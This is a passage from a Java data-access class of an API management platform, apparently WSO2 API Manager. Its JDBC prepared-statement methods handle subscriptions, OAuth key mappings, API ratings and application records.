conn); if (APIConstants.SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subsCreateStatus)) { deleteSubscriptionByApiIDAndAppID(apiId, applicationId, conn); } //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_OF_APPLICATION_SQL; //Updating data to the AM_SUBSCRIPTION table updatePs = conn.prepareStatement(sqlQuery); updatePs.setString(1, subStatus); updatePs.setString(2, identifier.getProviderName()); updatePs.setTimestamp(3, new Timestamp(System.currentTimeMillis())); updatePs.setInt(4, apiId); updatePs.setInt(5, applicationId); updatePs.execute(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to update subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(updatePs, null, null); } } /** * This method is used to update the subscription * * @param subscribedAPI subscribedAPI object that represents the new subscription detals * @throws APIManagementException if failed to update subscription */ public void updateSubscription(SubscribedAPI subscribedAPI) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_OF_UUID_SQL; //Updating data to the AM_SUBSCRIPTION table ps = conn.prepareStatement(sqlQuery); ps.setString(1, subscribedAPI.getSubStatus()); //TODO Need to find logged in user who does this update. ps.setString(2, null); ps.setTimestamp(3, new Timestamp(System.currentTimeMillis())); ps.setString(4, subscribedAPI.getUUID()); ps.execute(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update subscription ", e1); } } handleException("Failed to update subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public void updateSubscriptionStatus(int subscriptionId, String status) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query is to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_STATUS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, status); ps.setInt(2, subscriptionId); ps.execute(); //Commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback subscription status update ", e1); } } handleException("Failed to update subscription status ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public String getRegistrationApprovalState(int appId, String keyType) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String state = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_REGISTRATION_APPROVAL_STATUS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, appId); ps.setString(2, keyType); resultSet = ps.executeQuery(); while (resultSet.next()) { state = resultSet.getString("STATE"); } } catch (SQLException e) { handleException("Error while getting Application Registration State.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return state; } /** * Update the consumer key and application status for the given key type and application. * * @param application * @param keyType */ public void updateApplicationKeyTypeMapping(Application application, String keyType) throws APIManagementException { OAuthApplicationInfo app = application.getOAuthApp(keyType); String consumerKey = null; if (app != null) { consumerKey = app.getClientId(); } if (consumerKey != null && application.getId() != -1) { String addApplicationKeyMapping = SQLConstants.UPDATE_APPLICAITON_KEY_TYPE_MAPPINGS_SQL; Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(addApplicationKeyMapping); ps.setString(1, consumerKey); ps.setInt(2, application.getId()); ps.setString(3, keyType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error updating the CONSUMER KEY of the AM_APPLICATION_KEY_MAPPING table where " + "APPLICATION_ID = " + application.getId() + " and KEY_TYPE = " + keyType, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } } /** * This method will create a new client at key-manager side.further it will add new record to * the AM_APPLICATION_KEY_MAPPING table * * @param keyType * @param applicationName apim application name. * @param userName apim user name * @param clientId this is the consumner key. * @throws APIManagementException */ public void createApplicationKeyTypeMappingForManualClients(String keyType, String applicationName, String userName, String clientId) throws APIManagementException { String consumerKey = null; if (clientId != null) { consumerKey = clientId; } Connection connection = null; PreparedStatement ps = null; //APIM application id. int applicationId = getApplicationId(applicationName, userName); if (consumerKey != null) { String addApplicationKeyMapping = SQLConstants.ADD_APPLICATION_KEY_TYPE_MAPPING_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(addApplicationKeyMapping); ps.setInt(1, applicationId); ps.setString(2, consumerKey); ps.setString(3, keyType); ps.setString(4, APIConstants.AppRegistrationStatus.REGISTRATION_COMPLETED); // If the CK/CS pair is pasted on the screen set this to MAPPED ps.setString(5, "MAPPED"); ps.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while inserting record to the AM_APPLICATION_KEY_MAPPING table, " + "error is = " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } } /** * Updates the state of the Application Registration. * * @param state State of the registration. * @param keyType PRODUCTION | SANDBOX * @param appId ID of the Application. * @throws APIManagementException if updating fails. */ public void updateApplicationRegistration(String state, String keyType, int appId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; String sqlStmt = SQLConstants.UPDATE_APPLICATION_KEY_MAPPING_SQL; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); ps = conn.prepareStatement(sqlStmt); ps.setString(1, state); ps.setInt(2, appId); ps.setString(3, keyType); ps.execute(); conn.commit(); } catch (SQLException e) { handleException("Error while updating registration entry.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * @param apiIdentifier APIIdentifier * @param userId User Id * @return true if user subscribed for given APIIdentifier * @throws APIManagementException if failed to check subscribed or not */ public boolean isSubscribed(APIIdentifier apiIdentifier, String userId) throws APIManagementException { boolean isSubscribed = false; String loginUserName = getLoginUserName(userId); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(apiIdentifier.getProviderName())); ps.setString(2, apiIdentifier.getApiName()); ps.setString(3, apiIdentifier.getVersion()); ps.setString(4, loginUserName); int tenantId; tenantId = APIUtil.getTenantId(loginUserName); ps.setInt(5, tenantId); rs = ps.executeQuery(); if (rs.next()) { isSubscribed = true; } } catch (SQLException e) { handleException("Error while checking if user has subscribed to the API ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return isSubscribed; } /** * @param providerName Name of the provider * @return UserApplicationAPIUsage of given provider * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get * UserApplicationAPIUsage for given provider */ public UserApplicationAPIUsage[] getAllAPIUsageByProvider(String providerName) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_APP_API_USAGE_BY_PROVIDER_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(providerName)); result = ps.executeQuery(); Map<String, UserApplicationAPIUsage> userApplicationUsages = new TreeMap<String, UserApplicationAPIUsage>(); while (result.next()) { int subId = result.getInt("SUBSCRIPTION_ID"); Map<String, String> keyData = getAccessTokenData(subId); String accessToken = keyData.get("token"); String tokenStatus = keyData.get("status"); String userId = result.getString("USER_ID"); String application = result.getString("APPNAME"); int appId = result.getInt("APPLICATION_ID"); String subStatus = result.getString("SUB_STATUS"); String subsCreateState = result.getString("SUBS_CREATE_STATE"); String key = userId + "::" + application; UserApplicationAPIUsage usage = userApplicationUsages.get(key); if (usage == null) { usage = new UserApplicationAPIUsage(); usage.setUserId(userId); usage.setApplicationName(application); usage.setAppId(appId); usage.setAccessToken(accessToken); usage.setAccessTokenStatus(tokenStatus); userApplicationUsages.put(key, usage); } APIIdentifier apiId = new APIIdentifier(result.getString("API_PROVIDER"), result.getString ("API_NAME"), result.getString("API_VERSION")); SubscribedAPI apiSubscription = new SubscribedAPI(new Subscriber(userId), apiId); apiSubscription.setSubStatus(subStatus); apiSubscription.setSubCreatedStatus(subsCreateState); apiSubscription.setUUID(result.getString("SUB_UUID")); apiSubscription.setTier(new Tier(result.getString("SUB_TIER_ID"))); Application applicationObj = new Application(result.getString("APP_UUID")); apiSubscription.setApplication(applicationObj); usage.addApiSubscriptions(apiSubscription); } return userApplicationUsages.values().toArray(new UserApplicationAPIUsage[userApplicationUsages.size()]); } catch (SQLException e) { handleException("Failed to find API Usage for :" + providerName, e); return null; } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } } /** * @param apiName Name of the API * @param apiVersion Version of the API * @param provider Name of API creator * @return All subscriptions of a given API * @throws org.wso2.carbon.apimgt.api.APIManagementException */ public List<SubscribedAPI> getSubscriptionsOfAPI(String apiName, String apiVersion, String provider) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; List<SubscribedAPI> subscriptions = new ArrayList<>(); try { String sqlQuery = SQLConstants.GET_SUBSCRIPTIONS_OF_API_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, apiName); ps.setString(2, apiVersion); ps.setString(3, provider); result = ps.executeQuery(); while (result.next()) { APIIdentifier apiId = new APIIdentifier(result.getString("API_PROVIDER"), apiName, apiVersion); Subscriber subscriber = new Subscriber(result.getString("USER_ID")); SubscribedAPI subscription = new SubscribedAPI(subscriber, apiId); subscription.setUUID(result.getString("SUB_UUID")); subscription.setSubStatus(result.getString("SUB_STATUS")); subscription.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscription.setTier(new Tier(result.getString("SUB_TIER_ID"))); subscription.setCreatedTime(result.getString("SUB_CREATED_TIME")); Application application = new Application(result.getInt("APPLICATION_ID")); application.setName(result.getString("APPNAME")); subscription.setApplication(application); subscriptions.add(subscription); } } catch (SQLException e) { handleException("Error occurred while reading subscriptions of API: " + apiName + ':' + apiVersion, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptions; } private void updateOAuthConsumerApp(String appName, String callbackUrl) throws IdentityOAuthAdminException, APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String sqlStmt = SQLConstants.UPDATE_OAUTH_CONSUMER_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(sqlStmt); prepStmt.setString(1, callbackUrl); prepStmt.setString(2, appName); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error when updating OAuth consumer App for " + appName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } private boolean isDuplicateConsumer(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rSet = null; String sqlQuery = SQLConstants.GET_ALL_OAUTH_CONSUMER_APPS_SQL; boolean isDuplicateConsumer = false; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rSet = prepStmt.executeQuery(); if (rSet.next()) { isDuplicateConsumer = true; } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rSet); } return isDuplicateConsumer; } public int addApplication(Application application, String userId) throws APIManagementException { Connection conn = null; int applicationId = 0; String loginUserName = getLoginUserName(userId); try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); applicationId = addApplication(application, loginUserName, conn); if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); updateGroupIDMappings(conn, applicationId, application.getGroupId(), tenantDomain); } conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add Application ", e1); } } handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return applicationId; } public void addRating(APIIdentifier apiId, int rating, String user) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); addRating(apiId, rating, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add Application ", e1); } } handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to add Application */ public void addRating(APIIdentifier apiIdentifier, int rating, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; PreparedStatement psSelect = null; ResultSet rs = null; try { int tenantId; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } boolean userRatingExists = false; //This query to check the ratings already exists for the user in the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_API_RATING_SQL; psSelect = conn.prepareStatement(sqlQuery); psSelect.setInt(1, apiId); psSelect.setInt(2, subscriber.getId()); rs = psSelect.executeQuery(); while (rs.next()) { userRatingExists = true; } String sqlAddQuery; if (!userRatingExists) { //This query to update the AM_API_RATINGS table sqlAddQuery = SQLConstants.APP_API_RATING_SQL; } else { //This query to insert into the AM_API_RATINGS table sqlAddQuery = SQLConstants.UPDATE_API_RATING_SQL; } // Adding data to the AM_API_RATINGS table ps = conn.prepareStatement(sqlAddQuery); ps.setInt(1, rating); ps.setInt(2, apiId); ps.setInt(3, subscriber.getId()); ps.executeUpdate(); } catch (SQLException e) { handleException("Failed to add API rating of the user:" + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); APIMgtDBUtil.closeAllConnections(psSelect, null, null); } } public void removeAPIRating(APIIdentifier apiId, String user) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); removeAPIRating(apiId, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add Application ", e1); } } handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to add Application */ public void removeAPIRating(APIIdentifier apiIdentifier, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; PreparedStatement psSelect = null; ResultSet rs = null; try { int tenantId; int rateId = -1; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } //Get API Id int apiId = -1; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } //This query to check the ratings already exists for the user in the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_RATING_ID_SQL; psSelect = conn.prepareStatement(sqlQuery); psSelect.setInt(1, apiId); psSelect.setInt(2, subscriber.getId()); rs = psSelect.executeQuery(); while (rs.next()) { rateId = rs.getInt("RATING_ID"); } String sqlAddQuery; if (rateId != -1) { //This query to delete the specific rate row from the AM_API_RATINGS table sqlAddQuery = SQLConstants.REMOVE_RATING_SQL; // Adding data to the AM_API_RATINGS table ps = conn.prepareStatement(sqlAddQuery); ps.setInt(1, rateId); ps.executeUpdate(); } } catch (SQLException e) { handleException("Failed to delete API rating", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); APIMgtDBUtil.closeAllConnections(psSelect, null, rs); } } public int getUserRating(APIIdentifier apiId, String user) throws APIManagementException { Connection conn = null; int userRating = 0; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); userRating = getUserRating(apiId, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return userRating; } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to add Application */ public int getUserRating(APIIdentifier apiIdentifier, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; int userRating = 0; try { int tenantId; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } //Get API Id int apiId = -1; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } //This query to update the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_RATING_SQL; // Adding data to the AM_API_RATINGS table ps = conn.prepareStatement(sqlQuery); ps.setInt(1, subscriber.getId()); ps.setInt(2, apiId); rs = ps.executeQuery(); while (rs.next()) { userRating = rs.getInt("RATING"); } } catch (SQLException e) { handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return userRating; } public float getAverageRating(APIIdentifier apiId) throws APIManagementException { Connection conn = null; float avrRating = 0; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); avrRating = getAverageRating(apiId, conn); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return avrRating; } public float getAverageRating(int apiId) throws APIManagementException { Connection conn = null; float avrRating = 0; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); if (apiId == -1) { String msg = "Invalid APIId : " + apiId; log.error(msg); return Float.NEGATIVE_INFINITY; } //This query to update the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_AVERAGE_RATING_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { avrRating = rs.getFloat("RATING"); } } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return avrRating; } /** * @param apiIdentifier API Identifier * @throws APIManagementException if failed to add Application */ public float getAverageRating(APIIdentifier apiIdentifier, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; float avrRating = 0; try { //Get API Id int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); return Float.NEGATIVE_INFINITY; } //This query to update the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_AVERAGE_RATING_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { avrRating = rs.getFloat("RATING"); } } catch (SQLException e) { handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } BigDecimal decimal = new BigDecimal(avrRating); return Float.parseFloat(decimal.setScale(1, BigDecimal.ROUND_UP).toString()); } /** * @param application Application * @param userId User Id * @throws APIManagementException if failed to add Application */ public int addApplication(Application application, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; conn.setAutoCommit(false); ResultSet rs = null; int applicationId = 0; try { int tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } //This query to update the AM_APPLICATION table String sqlQuery = SQLConstants.APP_APPLICATION_SQL; // Adding data to the AM_APPLICATION table //ps = conn.prepareStatement(sqlQuery); ps = conn.prepareStatement(sqlQuery, new String[]{"APPLICATION_ID"}); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { ps = conn.prepareStatement(sqlQuery, new String[]{"application_id"}); } ps.setString(1, application.getName()); ps.setInt(2, subscriber.getId()); ps.setString(3, application.getTier()); ps.setString(4, application.getCallbackUrl()); ps.setString(5, application.getDescription()); if (APIConstants.DEFAULT_APPLICATION_NAME.equals(application.getName())) { ps.setString(6, APIConstants.ApplicationStatus.APPLICATION_APPROVED); } else { ps.setString(6, APIConstants.ApplicationStatus.APPLICATION_CREATED); } String groupId = application.getGroupId(); if (multiGroupAppSharingEnabled) { // setting an empty groupId since groupid's should be saved in groupId mapping table groupId = ""; } ps.setString(7, groupId); ps.setString(8, subscriber.getName()); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); ps.setTimestamp(9, timestamp); ps.setTimestamp(10, timestamp); ps.setString(11, UUID.randomUUID().toString()); ps.setString(12, String.valueOf(application.getTokenType())); ps.executeUpdate(); rs = ps.getGeneratedKeys(); while (rs.next()) { applicationId = Integer.parseInt(rs.getString(1)); } //Adding data to AM_APPLICATION_ATTRIBUTES table if( application.getApplicationAttributes() != null) { addApplicationAttributes(conn, application.getApplicationAttributes(), applicationId, tenantId); } } catch (SQLException e) { handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return applicationId; } public void updateApplication(Application application) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement preparedStatement = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to update the AM_APPLICATION table String sqlQuery = SQLConstants.UPDATE_APPLICATION_SQL; // Adding data to the AM_APPLICATION table ps = conn.prepareStatement(sqlQuery); ps.setString(1, application.getName()); ps.setString(2, application.getTier()); ps.setString(3, application.getCallbackUrl()); ps.setString(4, application.getDescription()); //TODO need to find the proper user who updates this application. ps.setString(5, null); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.setString(7, application.getTokenType()); ps.setInt(8, application.getId()); ps.executeUpdate(); if (multiGroupAppSharingEnabled) { Subscriber subscriber = application.getSubscriber(); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); updateGroupIDMappings(conn, application.getId(), application.getGroupId(), tenantDomain); } Subscriber subscriber = application.getSubscriber(); String domain = MultitenantUtils.getTenantDomain(subscriber.getName()); int tenantId = IdentityTenantUtil.getTenantId(domain); preparedStatement = conn.prepareStatement(SQLConstants.REMOVE_APPLICATION_ATTRIBUTES_SQL); preparedStatement.setInt(1,application.getId()); preparedStatement.execute(); if (log.isDebugEnabled()) { log.debug("Old attributes of application - " + application.getName() + " are removed"); } if (application.getApplicationAttributes() != null && !application.getApplicationAttributes().isEmpty()) { addApplicationAttributes(conn, application.getApplicationAttributes(), application.getId(), tenantId); } conn.commit(); updateOAuthConsumerApp(application.getName(), application.getCallbackUrl()); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } catch (IdentityOAuthAdminException e) { handleException("Failed to update OAuth Consumer Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); APIMgtDBUtil.closeAllConnections(preparedStatement,conn,null); } } /** * Update the status of the Application creation process * * @param applicationId * @param status * @throws APIManagementException */ public void updateApplicationStatus(int applicationId, String status) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String updateSqlQuery = SQLConstants.UPDATE_APPLICATION_STATUS_SQL; ps = conn.prepareStatement(updateSqlQuery); ps.setString(1, status); ps.setInt(2, applicationId); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * get the status of the Application creation process * * @param appName * @return * @throws APIManagementException */ public String getApplicationStatus(String appName, String userId) throws APIManagementException { int applicationId = getApplicationId(appName, userId); return getApplicationStatusById(applicationId); } /** * get the status of the Application creation process given the application Id * * @param applicationId Id of the Application * @return * @throws APIManagementException */ public String getApplicationStatusById(int applicationId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String status = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.GET_APPLICATION_STATUS_BY_ID_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); resultSet = ps.executeQuery(); while (resultSet.next()) { status = resultSet.getString("APPLICATION_STATUS"); } conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return status; } /** * Check whether given application name is available under current subscriber or group * * @param appName application name * @param username subscriber * @param groupId group of the subscriber * @return true if application is available for the subscriber * @throws APIManagementException if failed to get applications for given subscriber */ public boolean isApplicationExist(String appName, String username, String groupId) throws APIManagementException { if (username == null) { return false; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_PREFIX; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdCaseInsensitive = " AND (APP.GROUP_ID = ? " + "OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ) " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR (LOWER(SUB.USER_ID) = LOWER(?))" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInsensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; try { connection = APIMgtDBUtil.getConnection(); if (!StringUtils.isEmpty(groupId)) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupId.split(","); int noOfParams = grpIdArray.length; preparedStatement = fillQueryParams(connection, sqlQuery, grpIdArray, 2); preparedStatement.setString(1, appName); int paramIndex = noOfParams + 1; preparedStatement.setString(++paramIndex, tenantDomain); preparedStatement.setString(++paramIndex, subscriber.getName()); preparedStatement.setString(++paramIndex, tenantDomain + '/' + groupId); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithGroupId; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, groupId); preparedStatement.setString(3, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInsensitive; } else { sqlQuery += whereClause; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, subscriber.getName()); } resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { appId = resultSet.getInt("APPLICATION_ID"); } if (appId > 0) { return true; } } catch (SQLException e) { handleException("Error while getting the id of " + appName + " from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return false; } /** * Check whether the new user has an application * * @param appName application name * @param username subscriber * @return true if application is available for the subscriber * @throws APIManagementException if failed to get applications for given subscriber */ public boolean isApplicationOwnedBySubscriber(String appName, String username) throws APIManagementException { if (username == null) { return false; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_PREFIX; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInsensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; try { connection = APIMgtDBUtil.getConnection(); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInsensitive; } else { sqlQuery += whereClause; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, subscriber.getName()); resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { appId = resultSet.getInt("APPLICATION_ID"); } if (appId > 0) { return true; } } catch (SQLException e) { handleException("Error while getting the id of " 